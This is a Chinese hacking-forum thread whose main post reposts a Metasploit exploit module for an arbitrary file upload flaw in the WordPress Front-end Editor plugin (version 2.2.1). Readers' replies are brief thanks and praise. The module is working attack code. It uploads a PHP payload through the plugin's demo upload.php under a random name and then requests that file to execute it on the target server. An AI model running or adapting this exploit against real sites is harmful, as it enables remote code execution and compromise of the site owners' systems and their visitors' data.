Wordpress Front-end Editor上传漏洞

90_ · 发表于 2015-6-18 20:41:51

Description:
The Wordpress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type.

[PHP] 纯文本查看 复制代码

##
# This module requires Metasploit: [url]http://metasploit.com/download[/url]
# Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the wordpress
          api it's possible to upload any file type.
      },
      'Author'         =>
        [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))
  end
 
  def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
  end
 
  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'    => 'application/octet-stream',
      'headers'  => {
        'X-File-Name' => "#{filename}"
      },
      'data' => payload.encoded
    )
 
    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
 
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
      5
    )
  end
end
[2015-06-18]  #

我叫齐齐 · 发表于 2015-6-19 19:01:39

好深奥的样子

ruguoruo · 发表于 2015-6-26 23:05:23

感谢楼主的分享~

Sty，涛 · 发表于 2015-6-27 09:52:56

支持中国红客联盟(ihonker.org)

ruguoruo · 发表于 2015-6-27 13:53:58

支持中国红客联盟(ihonker.org)

小路 · 发表于 2015-6-28 02:09:41

感谢楼主的分享~

小路 · 发表于 2015-6-28 06:02:08

学习学习技术，加油！

r00tc4 · 发表于 2015-6-28 23:24:23

学习学习技术，加油！

Jack-5 · 发表于 2015-6-29 05:32:16

学习学习技术，加油！

云游者 · 发表于 2015-6-30 00:22:37

还是不错的哦，顶了

Wordpress Front-end Editor上传漏洞

相关帖子

浏览过的版块

指导单位

旗下站点

联系我们